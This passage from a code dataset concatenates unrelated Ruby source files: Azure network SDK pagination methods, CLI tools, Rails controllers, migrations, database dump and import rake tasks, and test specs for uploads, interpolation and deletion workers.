MsRestAzure::AzureOperationError.new(result.request, http_response, error_model) end result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil? result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil? result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil? # Deserialize Response if status_code == 200 begin parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content) result_mapper = Azure::Network::Mgmt::V2020_05_01::Models::ListVpnGatewaysResult.mapper() result.body = @client.deserialize(result_mapper, parsed_response) rescue Exception => e fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result) end end result end promise.execute end # # Lists all the VpnGateways in a subscription. # # @param next_page_link [String] The NextLink from the previous successful call # to List operation. # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [ListVpnGatewaysResult] operation results. # def list_next(next_page_link, custom_headers:nil) response = list_next_async(next_page_link, custom_headers:custom_headers).value! response.body unless response.nil? end # # Lists all the VpnGateways in a subscription. # # @param next_page_link [String] The NextLink from the previous successful call # to List operation. # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [MsRestAzure::AzureOperationResponse] HTTP response information. # def list_next_with_http_info(next_page_link, custom_headers:nil) list_next_async(next_page_link, custom_headers:custom_headers).value! end # # Lists all the VpnGateways in a subscription. # # @param next_page_link [String] The NextLink from the previous successful call # to List operation. # @param [Hash{String => String}] A hash of custom headers that will be added # to the HTTP request. # # @return [Concurrent::Promise] Promise object which holds the HTTP response. # def list_next_async(next_page_link, custom_headers:nil) fail ArgumentError, 'next_page_link is nil' if next_page_link.nil? request_headers = {} request_headers['Content-Type'] = 'application/json; charset=utf-8' # Set Headers request_headers['x-ms-client-request-id'] = SecureRandom.uuid request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil? path_template = '{nextLink}' request_url = @base_url || @client.base_url options = { middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]], skip_encoding_path_params: {'nextLink' => next_page_link}, headers: request_headers.merge(custom_headers || {}), base_url: request_url } promise = @client.make_request_async(:get, path_template, options) promise = promise.then do |result| http_response = result.response status_code = http_response.status response_content = http_response.body unless status_code == 200 error_model = JSON.load(response_content) fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model) end result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil? result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil? result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil? # Deserialize Response if status_code == 200 begin parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content) result_mapper = Azure::Network::Mgmt::V2020_05_01::Models::ListVpnGatewaysResult.mapper() result.body = @client.deserialize(result_mapper, parsed_response) rescue Exception => e fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result) end end result end promise.execute end # # Lists all the VpnGateways in a resource group. # # @param resource_group_name [String] The resource group name of the # VpnGateway. # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [ListVpnGatewaysResult] which provide lazy access to pages of the # response. # def list_by_resource_group_as_lazy(resource_group_name, custom_headers:nil) response = list_by_resource_group_async(resource_group_name, custom_headers:custom_headers).value! unless response.nil? page = response.body page.next_method = Proc.new do |next_page_link| list_by_resource_group_next_async(next_page_link, custom_headers:custom_headers) end page end end # # Lists all the VpnGateways in a subscription. # # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [ListVpnGatewaysResult] which provide lazy access to pages of the # response. # def list_as_lazy(custom_headers:nil) response = list_async(custom_headers:custom_headers).value! unless response.nil? page = response.body page.next_method = Proc.new do |next_page_link| list_next_async(next_page_link, custom_headers:custom_headers) end page end end end end
43.140596
149
0.698724
4a76ecaae0e16de7f47e5e0e0e421fb04e23a10c
398
require 'thor' require 'shopware/api/client' require 'shopware/cli/config' require 'shopware/cli/shell' module Shopware module CLI module Subcommands class Subcommand < Thor attr_reader :client include Config include Shell def initialize(*args) super @client = API::Client.new options.api end end end end end
15.92
47
0.623116
33747776a25c9fa8cf4424f3fa154e506d37296d
1,291
#-- copyright # ReportingEngine # # Copyright (C) 2010 - 2014 the OpenProject Foundation (OPF) # # This program is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License # version 3. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. #++ class Widget2::Controls::QueryName < Widget2::Controls dont_cache! # The name might change, but the query stays the same... def render options = { id: 'query_saved_name', 'data-translations' => translations } if @subject.new_record? name = l(:label_new_report_target) icon = '' else name = @subject.name options['data-is_public'] = @subject.public? options['data-is_new'] = @subject.new_record? end write(content_tag(:span, h(name), options) + icon.to_s) end def translations { isPublic: l(:field_is_public) }.to_json end end
32.275
81
0.711851
ff02ee0deb321d0886a837add5dfa2b2d8d313b7
280
class Admin::BaseController < ApplicationController before_action :authorize_admin! private def authorize_admin! return true if current_user && current_user.admin? flash[:alert] = "You are not permitted to access that." redirect_to root_url end end
21.538462
59
0.728571
26eee1c045c760940e1ccb37ef3ebf3064714a12
2,319
require 'rubygems' require 'thor' require 'yaml' require 'json' require 'launchy' require 'progress_bar' require 'screenshot' require "screenshooter/version" # Should get the values from the .browserstack file def get_credentials if ENV['BROWSERSTACK_USERNAME'] and ENV['BROWSERSTACK_TOKEN'] [ENV['BROWSERSTACK_USERNAME'], ENV['BROWSERSTACK_TOKEN']] else keypair = File.open("#{Dir.home}/.browserstack", &:readline) keypair.strip.split(":") end end module ScreenShooter class ShotMaster < Thor desc "list", "list systems" def list username, password = get_credentials client = Screenshot::Client.new({"username" => username, "password" => password}) puts client.get_os_and_browsers end desc "shoot", "take a screenshot" method_option :url, :aliases => "-u", :desc => "URL of page to screenshot" method_option :wait, :type => :boolean, :aliases => "-w", :default => false, :desc => "Wait for screenshots to be rendered?" method_option :open, :type => :boolean, :aliases => "-o", :default => false, :desc => "Open the URL in the browser?" method_option :quiet, :type => :boolean, :aliases => "-q", :default => false, :desc => "Don't show progress bar" def shoot(file="browsers.yaml") username, password = get_credentials client = Screenshot::Client.new({"username" => username, "password" => password}) file_extension = file.split('.')[-1] if file_extension == 'yaml' params = YAML::load( File.open( file ) ) elsif file_extension == 'json' params = JSON.parse( File.read(file) ) end if options.has_key? "url" params["url"] = options["url"] end begin request_id = client.generate_screenshots params rescue Exception => e puts e.message end shot_status = "pending" bar = ProgressBar.new(:elapsed) unless options[:quiet] begin shot_status = client.screenshots_status request_id sleep 2.5 bar.increment! unless options[:quiet] end while options["wait"] and shot_status != "done" screenshots_url = "http://www.browserstack.com/screenshots/#{request_id}" if options["open"] Launchy.open(screenshots_url) else puts screenshots_url end end end end
32.661972
128
0.648124
ab202e19b23e0b12620bd34f319e45b0d77ddc88
23
puts "Hello, world!"
5.75
20
0.608696
012a98e6c58652951df8db925f29e0ad0ff0d609
1,274
class CreateLeads < ActiveRecord::Migration[4.2] def self.up create_table :leads, force: true do |t| t.string :uuid, limit: 36 t.references :user t.references :campaign t.integer :assigned_to t.string :first_name, limit: 64, null: false, default: "" t.string :last_name, limit: 64, null: false, default: "" t.string :access, limit: 8, default: "Public" t.string :title, limit: 64 t.string :company, limit: 64 t.string :source, limit: 32 t.string :status, limit: 32 t.string :referred_by, limit: 64 t.string :email, limit: 64 t.string :alt_email, limit: 64 t.string :phone, limit: 32 t.string :mobile, limit: 32 t.string :blog, limit: 128 t.string :linkedin, limit: 128 t.string :facebook, limit: 128 t.string :twitter, limit: 128 t.string :address t.integer :rating, null: false, default: 0 t.boolean :do_not_call, null: false, default: false t.datetime :deleted_at t.timestamps end add_index :leads, %i[user_id last_name deleted_at], unique: true add_index :leads, :assigned_to end def self.down drop_table :leads end end
32.666667
68
0.597331
b90c77f6b6094d35012847eded3a251b3db7d75b
512
# Same as /sessions/new get '/login' do erb :'/users/login' end # Same as post /sessions post '/login' do user = User.find_by(username: params[:user][:username]) password = params[:user][:password] if user && User.authenticate(params[:user][:username], password) session[:user_id] = user.id redirect "/" else redirect '/login' end end # Same as delete /sessions/:id get '/logout' do session.clear redirect '/' end # Alias for /login get '/sessions/new' do redirect '/login' end
17.655172
66
0.662109
e2a5e853ce8356fa79909566bbbde9e9f756b3ed
758
class Baza::InfoActiveRecordMysql attr_reader :db def self.connection require "active_record" require "activerecord-jdbc-adapter" if RUBY_PLATFORM == "java" @conn_pool ||= ::ActiveRecord::Base.establish_connection( adapter: "mysql", host: "localhost", database: "baza-test", username: "baza-test", password: "password" ) @conn ||= @conn_pool.connection {pool: @conn_pool, conn: @conn} end def initialize(args = {}) data = Baza::InfoActiveRecordMysql.connection data.fetch(:conn).reconnect! @db = Baza::Db.new({ type: :active_record, conn: data.fetch(:conn) }.merge(args)) end def before @db.tables.list(&:drop) end def after @db.close end end
19.947368
66
0.630607
4af832e3febf6df26c0a368d7836c4a87ddf3f85
1,267
namespace :webmasters_cms do desc "dump a rails database" task :dump_db, [:out_file] => [:environment] do |t, args| if db_config = ActiveRecord::Base.configurations[Rails.env] db_name = db_config['database'] out_file = args[:out_file] || "/tmp/#{Time.now.strftime("%Y_%m_%d")}__#{db_name}.sql" p "Dumping #{db_name} to #{out_file}" command = ['mysqldump'] command << '-u' command << db_config['username'] command << "-p#{db_config['password']}" unless db_config['password'].blank? command << db_name command << '>' command << out_file system command.join(' ') end end desc "import a rails database dump" task :import_db_dump, [:import_file] => ["db:drop", "db:create", :environment] do |t, args| if db_config = ActiveRecord::Base.configurations[Rails.env] db_name = db_config['database'] import_file = args[:import_file] p "Importing #{import_file} to #{db_name}" command = ['mysql'] command << '-u' command << db_config['username'] command << "-p#{db_config['password']}" unless db_config['password'].blank? command << db_name command << '<' command << import_file system command.join(' ') end end end
32.487179
93
0.61326
086cc29f5e7b907dba218b1f3c50573a5457aa90
75
FactoryGirl.define do factory :comment do comment "MyText" end end
12.5
21
0.72
ed8e0332f49a6c3d1f6718f1afed9b73b1055230
285
class CreateReviews < ActiveRecord::Migration[5.1] def change create_table :reviews do |t| t.belongs_to :user, index: true t.belongs_to :instrument, index: true t.column :title, :string t.column :content, :string t.timestamps end end end
23.75
50
0.645614
d5c14c36445c09bcbb7917f8958a63dd38b109f0
121
class AddAvatarToAtractivo < ActiveRecord::Migration def change add_column :atractivos, :avatar, :string end end
20.166667
52
0.768595
bf82e065db5d9bde3675595cce5edf227c846c30
584
# Note that for simplicity's sake this is not thread-safe class SqlMonitor def initialize reset end def start(name, id, payload) return if %w(CACHE SCHEMA).include?(payload[:name]) @last_start = Time.now end def finish(name, id, payload) return if %w(CACHE SCHEMA).include?(payload[:name]) @queries << { sql: payload[:sql], duration_ms: (Time.now - @last_start) * 1000 } end def reset ret = @queries @queries = [] ret end end SQL_MONITOR = SqlMonitor.new ActiveSupport::Notifications.subscribe('sql.active_record', SQL_MONITOR)
19.466667
84
0.67637
e8a0646c05d70bf00c6c3c5166ac24d96d46c8b8
4,968
require 'spec_helper' describe "gws_share_files_upload_policy", type: :feature, dbscope: :example, js: true do let(:site) { gws_site } let!(:folder) { create :gws_share_folder } let!(:category) { create :gws_share_category } context "sanitizer setting" do before { login_gws_user } before do upload_policy_before_settings('sanitizer') end after do upload_policy_after_settings end it do visit gws_share_files_path(site) click_on folder.name # create click_on I18n.t("ss.links.new") click_on I18n.t("gws.apis.categories.index") wait_for_cbox do click_on category.name end within "form#item-form #addon-basic" do wait_cbox_open do click_on I18n.t('ss.buttons.upload') end end wait_for_cbox do attach_file "item[in_files][]", "#{Rails.root}/spec/fixtures/ss/file/keyvisual.jpg" click_button I18n.t("ss.buttons.save") end expect(page).to have_css('.file-view', text: 'keyvisual.jpg') expect(page).to have_css('.sanitizer-wait', text: I18n.t('ss.options.sanitizer_state.wait')) wait_cbox_close do click_on "keyvisual.jpg" end within '#selected-files' do expect(page).to have_css('.name', text: 'keyvisual.jpg') expect(page).to have_css('.sanitizer-wait', text: I18n.t('ss.options.sanitizer_state.wait')) end within "form#item-form" do fill_in "item[memo]", with: "new test" end within "footer.send" do click_on I18n.t('ss.buttons.upload') end expect(page).to have_css('#notice', text: I18n.t('ss.notice.saved')) within '.list-items' do expect(page).to have_content('keyvisual.jpg') expect(page).to have_css('.sanitizer-wait', text: I18n.t('ss.options.sanitizer_state.wait')) end file = Gws::Share::File.all.first expect(file.sanitizer_state).to eq 'wait' expect(Fs.exists?(file.path)).to be_truthy expect(Fs.exists?(file.sanitizer_input_path)).to be_truthy expect(Fs.cmp(file.path, file.sanitizer_input_path)).to be_truthy # show click_on file.name expect(page).to have_css('.sanitizer-wait', text: I18n.t('ss.options.sanitizer_state.wait')) # restore output_path = sanitizer_mock_restore(file) expect(file.sanitizer_state).to eq 'complete' expect(Fs.exists?(file.path)).to be_truthy expect(Fs.exists?(output_path)).to be_falsey click_on I18n.t('ss.links.back_to_index') expect(page).to have_css('.list-items .sanitizer-complete') click_on file.name expect(page).to have_css('.sanitizer-complete') # update click_on I18n.t("ss.links.edit") within "form#item-form" do attach_file "item[in_file]", "#{Rails.root}/spec/fixtures/ss/file/keyvisual.jpg" fill_in "item[name]", with: "modify" click_button I18n.t('ss.buttons.save') end expect(page).to have_css('#notice', text: I18n.t('ss.notice.saved')) expect(page).to have_css('.sanitizer-wait', text: I18n.t('ss.options.sanitizer_state.wait')) file.reload file_path = file.path sanitizer_input_path = file.sanitizer_input_path expect(Fs.cmp(file.path, file.sanitizer_input_path)).to be_truthy # soft delete click_on I18n.t("ss.links.delete") within "form" do click_on I18n.t("ss.buttons.delete") end expect(page).to have_css('#notice', text: I18n.t('ss.notice.deleted')) # hard delete visit gws_share_files_path(site) click_on I18n.t("ss.links.trash") click_on folder.name click_on file.name click_on I18n.t("ss.links.delete") within "form" do click_on I18n.t("ss.buttons.delete") end expect(page).to have_css('#notice', text: I18n.t('ss.notice.deleted')) expect(Fs.exists?(file_path)).to be_falsey expect(Fs.exists?(sanitizer_input_path)).to be_falsey end end context "restricted setting" do before { login_gws_user } before do upload_policy_before_settings('sanitizer') site.set(upload_policy: 'restricted') end after do upload_policy_after_settings end it do visit gws_share_files_path(site) click_on folder.name # create click_on I18n.t("ss.links.new") click_on I18n.t("gws.apis.categories.index") wait_for_cbox do click_on category.name end within "form#item-form #addon-basic" do wait_cbox_open do click_on I18n.t('ss.buttons.upload') end end wait_for_cbox do attach_file "item[in_files][]", "#{Rails.root}/spec/fixtures/ss/file/keyvisual.jpg" click_button I18n.t("ss.buttons.save") end page.accept_alert do expect(page).to have_no_css('.file-view') end expect(Gws::Share::File.all.count).to eq 0 end end end
31.443038
100
0.646135
38c26b143c7fbcbfb7995a5c2998076d64d8d338
79
class Collection < ApplicationRecord belongs_to :user belongs_to :show end
15.8
36
0.797468
117ac12d105770e0be0df4ddcc025606ee7855ef
3,010
require_relative '../spec_helper' describe 'interpolations' do describe 'interpolate' do let(:i) { Mumukit::Directives::Interpolations.new } it { expect(i.interpolations? '').to be false } it { expect(i.interpolations? 'test "foo" {}').to be false } it { expect(i.interpolations? 'test "foo" { /* here there is a test */ }').to be false } it { expect(i.interpolations? 'test "foo" { /**/ }').to be false } it { expect(i.interpolations? 'test "foo" { /*......*/ }').to be false } it { expect(i.interpolations? 'test "foo" { /*...foo...*/ }').to be true } it { expect(i.interpolate 'foo', {}).to eq ['foo', []] } it { expect(i.interpolate 'foo', {'bar' => 'lalala'}).to eq ['foo', []] } it { expect(i.interpolate 'foo /*...foo...*/', {'bar' => 'lalala'}).to eq ['foo /*...foo...*/', []] } it { expect(i.interpolate 'foo /*...bar...*/', {'bar' => 'lalala'}).to eq ['foo lalala', ['bar']] } it { expect(i.interpolate 'foo /*...bar...*/ /*...bar...*/', {'bar' => 'lalala'}).to eq ['foo lalala lalala', ['bar']] } it { expect(i.interpolate 'foo /*...foo...*/ /*...bar...*/', {}).to eq ['foo /*...foo...*/ /*...bar...*/', []] } it { expect(i.interpolate 'foo /*...baz...*/ /*...bar...*/', {'bar' => 'lalala', 'baz' => 'lelele'}).to eq ['foo lelele lalala', ['baz', 'bar']] } it { expect(i.interpolate 'foo /*...previousContent...*/ /*...bar...*/', lambda { |key| 'lalala' }).to eq ['foo lalala lalala', ['previousContent', 'bar']] } it { expect(i.interpolate 'foo /*...previousContent...*/ /*...bar...*/', lambda { |key| 'lalala' if key == 'previousContent' }).to eq ['foo lalala /*...bar...*/', ['previousContent']] } end describe 'transform' do let(:i) { Mumukit::Directives::Interpolations.new('test') } it { expect(i.transform('test' => 'baz', 'extra' => 'bar', 'content' => 'foo')).to eq 'test' => 'baz', 'extra' => 'bar', 'content' => 'foo' } it { expect(i.transform('test' => '/*...content...*/ baz /*...extra...*/', 'extra' => 'bar', 'content' => 'foo')).to eq 'test' => 'foo baz bar' } it { expect(i.transform('test' => '/*...content...*/ baz', 'extra' => 'bar', 'content' => 'foo')).to eq 'extra' => 'bar', 'test' => 'foo baz' } it { expect(i.transform('test' => '/*...content...*/ baz /*...extra...*/', 'content' => 'foo')).to eq 'test' => 'foo baz /*...extra...*/' } it { expect(i.transform('test' => '/*...content...*/ baz /*...extra...*/', 'content' => 'foo', 'extra' => '')).to eq 'test' => 'foo baz ' } end end
54.727273
189
0.43588
e8a512886b6170f40893541e70c30e2c023f1e85
1,575
class Makefile2graph < Formula desc "Create a graph of dependencies from GNU-Make" homepage "https://github.com/lindenb/makefile2graph" url "https://github.com/lindenb/makefile2graph/archive/v1.5.0.tar.gz" sha256 "9464c6c1291609c211284a9889faedbab22ef504ce967b903630d57a27643b40" head "https://github.com/lindenb/makefile2graph.git" bottle do cellar :any_skip_relocation sha256 "af7dba0cbb045f067076706310b30c52eddbd6732e60d16017ccbfadd4bc866d" => :catalina sha256 "5b5cb69a698628af41b3de70146580bbcb2e88a8b6d87d7fe9b4f58a2f2fdfb2" => :mojave sha256 "51231ed0ef44fd31a10f4ea0a7500570181332786ddd5a8a9a886958ad1b1408" => :high_sierra sha256 "274ee025c45df9757d608249d64105b9314c8e59fc52a81ad6906f807498b67c" => :sierra sha256 "ed1939b1b0fd106f3e328e310a887cf454b81481f78fdf57ce75c0480a922d7d" => :el_capitan sha256 "37aebae489e0f341f80417ec711e5c2817f5b8097c3493dcc11bc754bdd1b1cf" => :yosemite sha256 "0de3d4a2492797c3259798493e287ac2403f02254c6cfcf74948a16bcc4bcd0d" => :mavericks end depends_on "graphviz" def install system "make" system "make", "test" bin.install "make2graph", "makefile2graph" man1.install "make2graph.1", "makefile2graph.1" doc.install "LICENSE", "README.md", "screenshot.png" end test do (testpath/"Makefile").write <<~EOS all: foo all: bar foo: ook bar: ook ook: EOS system "make -Bnd >make-Bnd" system "#{bin}/make2graph <make-Bnd" system "#{bin}/make2graph --root <make-Bnd" system "#{bin}/makefile2graph" end end
36.627907
93
0.754921
e2a8f77acaec8e0a12a0d3dea9d38f74477f71cc
90
Rails.application.routes.draw do mount Mayodon::Webapp::Engine => "/mayodon-webapp" end
22.5
52
0.755556
877866b9b232d10da9b57c93a0330cb451d0880b
2,047
# frozen_string_literal: true module Gitlab module Database # This abstract class is used for models which need to exist in multiple de-composed databases. class SharedModel < ActiveRecord::Base self.abstract_class = true # if shared model is used, this allows to limit connections # on which this model is being shared class_attribute :limit_connection_names, default: nil class << self def using_connection(connection) previous_connection = self.overriding_connection unless previous_connection.nil? || previous_connection.equal?(connection) raise "Cannot change connection for Gitlab::Database::SharedModel "\ "from '#{Gitlab::Database.db_config_name(previous_connection)}' "\ "to '#{Gitlab::Database.db_config_name(connection)}'" end # connection might not be yet adopted (returning nil, and no gitlab_schemas) # in such cases it is fine to ignore such connections gitlab_schemas = Gitlab::Database.gitlab_schemas_for_connection(connection) unless gitlab_schemas.nil? || gitlab_schemas.include?(:gitlab_shared) raise "Cannot set `SharedModel` to connection from `#{Gitlab::Database.db_config_name(connection)}` " \ "since this connection does not include `:gitlab_shared` schema." end self.overriding_connection = connection yield ensure self.overriding_connection = previous_connection end def connection if connection = self.overriding_connection connection else super end end private def overriding_connection Thread.current[:overriding_connection] end def overriding_connection=(connection) Thread.current[:overriding_connection] = connection end end def connection_db_config self.class.connection_db_config end end end end
31.984375
115
0.656082
f8b29f8ae0a5cad27c73e2b7deabf08e1171d865
212
class AddImageToProducts < ActiveRecord::Migration[5.0] def self.up change_table :products do |t| t.attachment :image end end def self.down drop_attached_file :products, :image end end
17.666667
55
0.698113
79fde515490f6f4c552566358efc701e10b563ac
1,126
# Configure Rails Environment ENV["RAILS_ENV"] = "test" require_relative "../test/dummy/config/environment" ActiveRecord::Migrator.migrations_paths = [File.expand_path("../test/dummy/db/migrate", __dir__)] require "rails/test_help" # Filter out Minitest backtrace while allowing backtrace from other libraries # to be shown. Minitest.backtrace_filter = Minitest::BacktraceFilter.new require "rails/test_unit/reporter" Rails::TestUnitReporter.executable = 'bin/test' # Load fixtures from the engine if ActiveSupport::TestCase.respond_to?(:fixture_path=) ActiveSupport::TestCase.fixture_path = File.expand_path("fixtures", __dir__) ActionDispatch::IntegrationTest.fixture_path = ActiveSupport::TestCase.fixture_path ActiveSupport::TestCase.file_fixture_path = ActiveSupport::TestCase.fixture_path + "/files" ActiveSupport::TestCase.fixtures :all end class ActiveSupport::TestCase private def create_file_blob(filename:, content_type:, metadata: nil) ActiveStorage::Blob.create_after_upload! io: file_fixture(filename).open, filename: filename, content_type: content_type, metadata: metadata end end
38.827586
146
0.796625
ed3dfd9bd44b4cb2dccc35d517b6f0e304d2733d
944
require 'rails_helper' include Warden::Test::Helpers RSpec.describe Admin::CustomEmailsController do let!(:admin) {create(:admin, superadmin: true)} before do sign_in admin end describe "GET show" do it "renders the show template" do get :show expect(assigns(:form).present?).to be_truthy expect(response).to render_template("show") end end describe "POST create" do it "should create a message" do post :create, params: { custom_email_form: { message: 'test', scope: 'myself', subject: 'test' } } expect(response).to redirect_to admin_custom_email_path post :create, params: { custom_email_form: { message: 'test', scope: 'myself', subject: 'test' } } expect(response).to redirect_to admin_custom_email_path end it "should render show" do post :create, params: { custom_email_form: { } } expect(response).to render_template("show") end end end
30.451613
104
0.681144
b99034853409187aa2f2f1204a84d314944ddadd
2,209
# frozen_string_literal: true require 'rails_helper' require 'gumboot/shared_examples/application_controller' class SomeReportsController < ApplicationController; end RSpec.describe ApplicationController, type: :controller do include_examples 'Application controller' controller do before_action :ensure_authenticated def federation_growth public_action render nothing: true end end before do @routes.draw do match 'some_reports/report_action/:id' => 'some_reports#report_action', via: %i[get post] match 'anonymous/federation_growth' => 'anonymous#federation_growth', via: %i[get post] end end context 'when request is session' do it 'POST request should not create a uri session' do post :federation_growth expect(session).not_to include(:return_url) end it 'GET request should not create a uri session' do get :federation_growth uri = URI.parse(session[:return_url]) expect(uri.path).to eq('/anonymous/federation_growth') expect(uri.query).to be_blank expect(uri.fragment).to be_blank end it 'GET request should create a uri session including fragments' do get :federation_growth, params: { time: 1000 } uri = URI.parse(session[:return_url]) expect(uri.path).to eq('/anonymous/federation_growth') expect(uri.query).to eq('time=1000') expect(uri.fragment).to be_blank end end context 'use time zone around filter' do let(:user) { create :subject, :authorized } let!(:zone) { Faker::Address.time_zone } controller SomeReportsController do before_action :ensure_authenticated def report_action public_action @text = Time.zone.name head :accepted end end before do session[:subject_id] = user.try(:id) Rails.application.config.reporting_service.time_zone = zone routes.draw { get 'report_action' => 'some_reports#report_action' } get :report_action end # timezone within actions specify 'inside action scope' do expect(assigns[:text]).to eq(zone) expect(Time.zone.name).not_to eq(zone) end end end
26.939024
77
0.685831
b983774bbab988c12e7c8dbf38dcfa2e92c810b4
3,939
# frozen_string_literal: true require 'test_helper' class DeletePlainObjectWorkerTest < ActiveSupport::TestCase class DestroyableObjectsTest < DeletePlainObjectWorkerTest def setup factory_names = %i[simple_provider service application_plan metric] @objects = factory_names.map { |factory_name| FactoryBot.create(factory_name) } end attr_reader :objects def test_perform_destroy_by_association objects.each do |object| DeletePlainObjectWorker.perform_now(object, %w[HTestClass123 HTestClass1123]) assert object.destroyed_by_association assert_raise(ActiveRecord::RecordNotFound) { object.reload } end end def test_perform_destroy_without_association objects.each do |object| DeletePlainObjectWorker.perform_now(object, %w[HTestClass123]) refute object.destroyed_by_association assert_raise(ActiveRecord::RecordNotFound) { object.reload } end end end class UndestroyableObjectsTest < DeletePlainObjectWorkerTest def setup @object = FactoryBot.create(:service) @object.stubs(:destroyable?).returns(false) end attr_reader :object def test_perform_destroy_by_association DeletePlainObjectWorker.perform_now(object, %w[HTestClass123 HTestClass1123]) System::ErrorReporting.expects(:report_error).never assert_nothing_raised(ActiveRecord::RecordNotDestroyed) { DeletePlainObjectWorker.perform_now(object, %w[HTestClass123 HTestClass1123]) } refute object.destroyed? end def test_perform_destroy_without_association System::ErrorReporting.expects(:report_error).once.with do |exception, options| exception.is_a?(ActiveRecord::RecordNotDestroyed) \ && (parameters = options[:parameters]) \ && parameters[:caller_worker_hierarchy] == ['Hierarchy-TestClass-123', "Plain-#{object.class}-#{object.id}"] \ && parameters[:error_messages] == ['This service cannot be removed'] end assert_nothing_raised(ActiveRecord::RecordNotDestroyed) { DeletePlainObjectWorker.perform_now(object, %w[Hierarchy-TestClass-123]) } refute object.destroyed? end end class StaleObjectErrorTest < DeletePlainObjectWorkerTest module LoadTargetWithFiber # Overriding the `delete` method of HasOneAssociation https://github.com/rails/rails/blob/4-2-stable/activerecord/lib/active_record/associations/has_one_association.rb#L53-L64 # When entering this method, override the `load_target` method so we can hand over the execution to the main thread def delete def load_target super.tap { Fiber.yield } end super end end def test_race_condition service = FactoryBot.create(:simple_service) # There is a restriction on deleting service, at least one should remain FactoryBot.create(:simple_service, account: service.account) proxy = Proxy.find service.proxy.id service = Service.find service.id # Make sure that there is no more than one because it is a `has_one` association assert_equal 1, Proxy.where(service_id: service.id).count proxy_association = service.association :proxy # Hook into the Eigenclass class << proxy_association prepend LoadTargetWithFiber end # Execute deletion of service but suspend the execution of deleting the proxy by `:dependent => :destroy` f1 = Fiber.new do DeletePlainObjectWorker.perform_now(service, ['Hierarchy-Service-ID']) end # Destroy the proxy in another thread f2 = Fiber.new do DeletePlainObjectWorker.perform_now(proxy, ['Hierarchy-Service-ID', 'Hierarchy-Proxy-ID']) end f1.resume f2.resume f1.resume assert_raise(ActiveRecord::RecordNotFound) { proxy.reload } assert_raise(ActiveRecord::RecordNotFound) { service.reload } end end end
36.137615
181
0.720741
3835aa1bc243df5f8402bba70c0c239be7bfffd4
121
Rails.application.routes.draw do root :to => redirect("/style-guide") mount StyleGuide::Engine => "/style-guide" end
24.2
44
0.710744
abc0fd99488a824d09e82623f975babade3b5a20
628
require 'active_support/concern' require 'rails/rack/logger' module Rails module Rack # Overwrites defaults of Rails::Rack::Logger that cause # unnecessary logging. # This effectively removes the log lines from the log # that say: # Started GET / for 192.168.2.1... class Logger # Overwrites Rails 3.2 code that logs new requests def call_app(*args) env = args.last @app.call(env) ensure ActiveSupport::LogSubscriber.flush_all! end # Overwrites Rails 3.0/3.1 code that logs new requests def before_dispatch(env) end end end end
24.153846
60
0.652866
79fb5374dbdaddca7fd909defec24c53c0e5d067
1,702
module Spree class StockItem < ActiveRecord::Base acts_as_paranoid belongs_to :stock_location, class_name: 'Spree::StockLocation' belongs_to :variant, class_name: 'Spree::Variant', touch: true has_many :stock_movements validates_presence_of :stock_location, :variant validates_uniqueness_of :variant_id, scope: [:stock_location_id, :deleted_at] delegate :weight, :should_track_inventory?, to: :variant def backordered_inventory_units Spree::InventoryUnit.backordered_for_stock_item(self) end def variant_name variant.name end def adjust_count_on_hand(value) self.with_lock do self.count_on_hand = self.count_on_hand + value process_backorders(count_on_hand - count_on_hand_was) self.save! end end def set_count_on_hand(value) self.count_on_hand = value process_backorders(count_on_hand - count_on_hand_was) self.save! end def in_stock? self.count_on_hand > 0 end # Tells whether it's available to be included in a shipment def available? self.in_stock? || self.backorderable? end private def count_on_hand=(value) write_attribute(:count_on_hand, value) end # Process backorders based on amount of stock received # If stock was -20 and is now -15 (increase of 5 units), then we should process 5 inventory orders. # If stock was -20 but then was -25 (decrease of 5 units), do nothing. def process_backorders(number) if number > 0 backordered_inventory_units.first(number).each do |unit| unit.fill_backorder end end end end end
26.59375
105
0.683314
0318d1798c42768e8221ea9f2e58d96db6ac656d
172
# frozen_string_literal: true require 'test_helper' class EvidencesControllerTest < ActionDispatch::IntegrationTest # test "the truth" do # assert true # end end
17.2
63
0.755814
388c5a605ee6b3a301d2d9826bd7f1669a30a306
674
module Chapex module Check # check class base class Base @subclasses = [] def self.inherited(subclass) @subclasses << subclass.new end def self.all @subclasses end attr_reader :violations def initialize @violations = [] end def add_violation(location, *message_args) message = build_message(message_args) violation = Violation.new(message, location) @violations << violation end def build_message(args) if args.length.zero? self.class::MSG else self.class::MSG % args end end end end end
18.216216
52
0.568249
4a1d5f24361734d7e86b1c46533bcd307e1153c5
171
class User < ActiveRecord::Base validates_presence_of :username has_secure_password has_many :user_workouts has_many :workouts, through: :user_workouts end
28.5
47
0.777778
87a0662e1620dca199ef85bb6bec47e1dd26ec30
439
module Grape module Validations class PresenceValidator < Validator def validate!(params) return unless @scope.should_validate?(params) super end def validate_param!(attr_name, params) unless params.respond_to?(:key?) && params.key?(attr_name) raise Grape::Exceptions::Validation, param: @scope.full_name(attr_name), message_key: :presence end end end end end
25.823529
105
0.658314
1aa337ac21a7c35dd606fdc57d8d8fb636ac7889
213
